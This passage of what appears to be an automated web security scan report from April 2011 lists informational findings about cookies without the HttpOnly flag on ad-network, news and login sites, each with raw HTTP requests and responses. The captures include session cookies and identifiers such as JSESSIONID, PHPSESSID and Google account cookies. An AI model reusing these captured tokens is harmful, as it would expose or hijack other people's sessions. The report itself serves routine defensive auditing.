Set-Cookie: taboola_rii=4873735584806990345_3501622745956464883_3170890797665116434;Path=/hearst-wptz/;Expires=Sun, 08-Apr-12 12:30:47 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

6.176. http://valtira.com/page/1/valtira-Marketing-Tools.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://valtira.com
Path:   /page/1/valtira-Marketing-Tools.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /page/1/valtira-Marketing-Tools.jsp HTTP/1.1
Host: valtira.com
Proxy-Connection: keep-alive
Referer: http://valtira.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VLTSID=rHTkRVaEF2pqO; JSESSIONID=3C47A68301185EB621E479EA2B81A26C.valtira-com-2; VLTALT=325428#valtira.com; __utmz=152738878.1302308422.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=152738878.105465705.1302308422.1302308422.1302308422.1; __utmc=152738878; __utmb=152738878.1.10.1302308422

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:20:34 GMT
Server: Apache
Set-Cookie: VLTALT=325428#valtira.com; Domain=valtira.com; Expires=Tue, 06-Apr-2021 00:20:34 GMT; Path=/
Cache-Control: private,no-cache,no-store,must-revalidate
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19852


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en
...[SNIP]...
6.177. http://valtira.com/page/1/valtira-contact-od.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://valtira.com
Path:   /page/1/valtira-contact-od.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /page/1/valtira-contact-od.jsp HTTP/1.1
Host: valtira.com
Proxy-Connection: keep-alive
Referer: http://valtira.com/page/1/valtira-Marketing-Tools.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VLTSID=rHTkRVaEF2pqO; JSESSIONID=3C47A68301185EB621E479EA2B81A26C.valtira-com-2; __utmz=152738878.1302308422.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VLTALT=325428#valtira.com; __utma=152738878.105465705.1302308422.1302308422.1302308422.1; __utmc=152738878; __utmb=152738878.2.10.1302308422

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:21:39 GMT
Server: Apache
Set-Cookie: VLTALT=325428#valtira.com; Domain=valtira.com; Expires=Tue, 06-Apr-2021 00:21:39 GMT; Path=/
Cache-Control: private,no-cache,no-store,must-revalidate
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8087


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en
...[SNIP]...
6.178. http://vlog.leadforce1.com/bf/bf.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vlog.leadforce1.com
Path:   /bf/bf.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bf/bf.php?idsite=5796&url=http%3A%2F%2Fwww.clickability.com%2F&res=1920x1200&h=19&m=18&s=5&cookie=1&urlref=&rand=0.7162025312427431&pdf=1&qt=0&realp=0&wma=0&dir=0&fla=1&java=1&gears=1&ag=1&action_name=&title=Clickability%20%7C%20www.clickability.com%20%7C%20SaaS%20Web%20Content%20Management%20System%20(WCM)%20for%20Enterprises&_lf1=&vt_=NGJjOTVmNjMxNWNmOWMzMzQyMGVhYjVjMTZmZDlkZTM%3D HTTP/1.1
Host: vlog.leadforce1.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 09 Apr 2011 00:18:12 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: CP='OTI DSP COR NID STP UNI OTPa OUR'
Set-Cookie: lf1_visitor5796=1%3DNzY4ODViM2M0MWMzYWE0ODU2OGIxZDY4OWU0N2MzMTU%3D%3A2%3DMTMwMjMwODI5Mg%3D%3D%3A3%3DMTMwMjMwODI5MA%3D%3D%3A4%3DNTU0ODg0Njk%3D%3A5%3DMjI1MDgxMA%3D%3D; expires=Mon, 08-Apr-2013 00:18:12 GMT; domain=.leadforce1.com
Set-Cookie: lf1_visitor5796=deleted; expires=Fri, 09-Apr-2010 00:18:11 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
6.179. http://wcax.upickem.net/engine/Splash.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wcax.upickem.net
Path:   /engine/Splash.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /engine/Splash.aspx?contestid=17178 HTTP/1.1
Host: wcax.upickem.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: contestid=17178; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
Set-Cookie: UPETemporaryShoppingCartID17178=36497604-4/9/2011 8:31:11 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: 293976; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sat, 09 Apr 2011 12:31:11 GMT
Content-Length: 39215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
6.180. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/i%3B235348774%3B0-0%3B1%3B56224653%3B4699-255/300%3B40375962/40393749/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:29:58 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=8355cccd-c024-4752-b653-5cfe292a9982; expires=Sun, 09-Oct-2011 12:29:58 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style>                    body { font-family
...[SNIP]...
6.181. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/ServiceLogin?service=websiteoptimizer&hl=en&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_medium=et&utm_source=us-en-et-bizsol-0-biz1-all&utm_campaign=en HTTP/1.1
Host: www.google.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=e01b203a99971f0c:U=d212295d0f1573ee:FF=0:TM=1301786785:LM=1301836821:S=AJ4YE05fu5cLNNZE; NID=45=2n0e1W5_MaAh41CXKSdoaXqu35vMbjiifVyRtn1DMBwVJbE13IvcMlZIDijsF8MaTOfxdNQyHiFXdBnEPtokSQyvX00Wk2NFdxWix3dMOgE1UIQOzRT2_vJoVC6naACD

Response

HTTP/1.1 200 OK
Set-Cookie: GoogleAccountsLocale_session=en; Secure
Set-Cookie: GALX=QoTBtadx6jU;Path=/accounts;Secure
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=service%3Dwebsiteoptimizer%26continue%3Dhttps%253A%252F%252Fwww.google.com%252Fanalytics%252Fsiteopt%252F%253Fet%253Dreset%2526hl%253Den
Date: Sat, 09 Apr 2011 00:17:14 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 43949

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr">
<style type="text/css"><!--
body,td,div,p,a,font,span {font-family:
...[SNIP]...
6.182. http://www.marqui.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marqui.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.marqui.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:15 GMT
Server: Microsoft-IIS/6.0
ServerName: Web01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2bwdtg55kc1vdz454wahsa45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19066
Set-Cookie: LBWEB0102=4090937773.1.3687065408.2276017286; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page updated by Marqui on: 4/8/2011 6:05:11 AM marqui2010 p1s3 6.7.0000.
...[SNIP]...
6.183. http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /Google-Website-Optimizer-Technology-Partner.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Google-Website-Optimizer-Technology-Partner.aspx HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 09 Apr 2011 00:18:35 GMT
Set-Cookie: ASP.NET_SessionId=3wberx45beiwegerbeufdma2; path=/; HttpOnly
Set-Cookie: X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; path=/
X-Powered-By: ASP.NET
Content-Length: 51374


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Google Web
...[SNIP]...
6.184. http://www.mvtimes.com/marthas-vineyard/includes/common/captchaImage.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/includes/common/captchaImage.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /marthas-vineyard/includes/common/captchaImage.php?width=120&height=40&characters=6&code=yn4p7r HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/article.php?id=4030
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=340f9a2f4e744e94e83d808165edd48d; __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.6.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:17:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Set-Cookie: captchaCode=yn4p7r; expires=Wed, 13-Apr-2011 15:17:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: image/jpeg
Content-Length: 3448

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
6.185. http://www.wesh.com/images/structures/misc/play_overlay_small.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wesh.com
Path:   /images/structures/misc/play_overlay_small.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/structures/misc/play_overlay_small.png HTTP/1.1
Host: www.wesh.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 28 Sep 2009 16:28:52 GMT
ETag: "266c010-7a0-cb0e9900"
Accept-Ranges: bytes
Content-Length: 1952
Content-Type: image/png
Cache-Control: max-age=574
Expires: Sat, 09 Apr 2011 12:40:21 GMT
Date: Sat, 09 Apr 2011 12:30:47 GMT
Connection: close
Set-Cookie: alpha=66ce8f18607900007751a04d69db000053710100; expires=Tue, 06-Apr-2021 12:30:47 GMT; path=/; domain=.wesh.com

.PNG
.
...IHDR...%...%....... .....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx..XmLSW......1$..8]..R0..@....pF..K...M0..c]D....%..Y.O...@......e.D....vP`[. .El....9...........s.9.s..=.9.K(...v.....d
...[SNIP]...
6.186. http://www.wmur.com/images/structures/tabs/sponsor_tile_transparent.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wmur.com
Path:   /images/structures/tabs/sponsor_tile_transparent.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/structures/tabs/sponsor_tile_transparent.png HTTP/1.1
Host: www.wmur.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 21 Nov 2008 21:16:37 GMT
ETag: "5056b9f-1a1-8f7bf740"
Accept-Ranges: bytes
Content-Length: 417
Content-Type: image/png
Cache-Control: max-age=637
Expires: Sat, 09 Apr 2011 12:41:22 GMT
Date: Sat, 09 Apr 2011 12:30:45 GMT
Connection: close
Set-Cookie: alpha=57ce8f18196800007551a04d8dc00300d1120100; expires=Tue, 06-Apr-2021 12:30:45 GMT; path=/; domain=.wmur.com

.PNG
.
...IHDR...<...
.......=.....tEXtSoftware.Adobe ImageReadyq.e<...CIDATx....m.0......#.....@G.#.1."#4#..`.x.f.2.=K?.W...]z...}..}..0....=....
~.E.4.....W.d......g/~.a0...>.....7$....W.Q....'..g
...[SNIP]...
6.187. http://www.wptz.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wptz.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: AkamaiGHost
Content-Length: 0
Location: /index.html
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:29:43 GMT
Date: Sat, 09 Apr 2011 12:29:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; expires=Tue, 06-Apr-2021 12:29:43 GMT; path=/; domain=.wptz.com

6.188. http://www.wtp101.com/ab_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /ab_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ab_sync?redir=http%3a%2f%2fads.adbrite.com%2fadserver%2fvdi%2f810647%3fd%3d HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sat, 09 Apr 2011 12:35:47 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: /ab_sync?ul_cb=1&redir=http%3a%2f%2fads.adbrite.com%2fadserver%2fvdi%2f810647%3fd%3d
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=fcce245a-c15b-4c68-b180-e63dd18b1b28; path=/; expires=Mon, 08 Apr 2013 12:35:47 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive

6.189. http://xcdn.xgraph.net/15530/db/xg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xcdn.xgraph.net
Path:   /15530/db/xg.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4d97b40ad252fd37 HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=E5C15F54E89FC1D8CC357C3F58B7D073; _xguid=2D1DC4E5E752B158F1CB915A3433DA9B; _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Apache-Coyote/1.1
Content-Length: 43
Expires: Sat, 09 Apr 2011 00:21:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:21:59 GMT
Connection: close
Set-Cookie: _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2; Domain=.xgraph.net; Expires=Tue, 08-Apr-2014 00:21:59 GMT; Path=/
Set-Cookie: _push4xgat=1302308519206; Domain=.xgraph.net; Expires=Sun, 10-Apr-2011 00:21:59 GMT; Path=/
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"

GIF89a.............!.......,...........D..;
6.190. http://y.cdn.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://y.cdn.adblade.com
Path:   /imps.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html, HTTP/1.1
Host: y.cdn.adblade.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAACAwd-20z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqMpwLvyHsCa7x.O.NrHwpEVGlz2pya-BtpgD9AAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D2946263302%26B%3D10%26r%3D0,e860ecda-6462-11e0-9f69-003048d6d894
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-type: text/html
Date: Mon, 11 Apr 2011 17:41:19 GMT
Expires: Mon, 11 Apr 2011 17:41:19 GMT
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Pragma: no-cache
Server: lighttpd/1.4.18
Set-Cookie: __tuid=2298699369328420558; expires=Sat, 09-Apr-2016 17:41:19 GMT; path=/; domain=.adblade.com
Set-Cookie: __impt=1302543679.804242756343; expires=Tue, 12-Apr-2011 17:41:19 GMT; path=/
X-Powered-By: PHP/5.2.8
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-Length: 14514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
7. Password field with autocomplete enabled  previous  next
There are 9 instances of this issue:

Issue background

